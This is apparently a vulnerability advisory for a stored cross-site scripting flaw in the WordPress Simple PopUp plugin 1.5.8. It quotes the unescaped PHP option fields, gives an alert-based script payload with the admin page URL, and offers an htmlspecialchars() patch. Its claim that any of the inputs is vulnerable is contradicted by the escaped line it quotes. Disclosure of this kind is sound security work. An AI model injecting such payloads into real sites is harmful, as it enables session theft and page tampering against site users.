Wordpress 1.5.8 Simple PopUp Plugin Cross Site Scripting

2015-08-19
ID: 81232
CVE: None
Download vulnerable application: None
######################
# Exploit Title : Wordpress Simple PopUp Plugin Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/simple-popup/
# Date: 2015-08-18
# Tested On : Windows - Firefox
# Software Link : https://downloads.wordpress.org/plugin/simple-popup.zip
# Version : 1.5.8
######################
# Vulnerable File :
sp-options.php (WordPress SimplePop Options)

######################
# Vulnerable Codes :
19:        register_setting( 'sp-settings-group', 'popup_box_delay' );
22:        register_setting( 'sp-settings-group', 'popup_box_rounded_corner');
48: <input type="text" name="popup_box_delay" value="<?php echo htmlspecialchars(get_option('popup_box_delay')); ?>" />
72: <input type="text" name="popup_box_rounded_corner" value="<?php echo get_option('popup_box_rounded_corner'); ?>" />

######################
# Exploit :
To test for cross-site scripting, enter the payload below into any of the inputs above and save the settings; the stored value is echoed back unescaped into the input's value attribute.
Address of the WordPress SimplePop Options page:
http://localhost/wordpress/wp-admin/admin.php?page=simple-popup%2Fsp-options.php
"><script>alert(/xss/)</script>

######################
# Patch:
To fix this vulnerability, escape the option value on output with the htmlspecialchars() function, as on line 48, before it is echoed into the attribute:
48: <input type="text" name="popup_box_delay" value="<?php echo htmlspecialchars(get_option('popup_box_delay')); ?>" />
72: <input type="text" name="popup_box_rounded_corner" value="<?php echo htmlspecialchars(get_option('popup_box_rounded_corner')); ?>" />

######################
# Discovered By : Ehsan Hosseini.
######################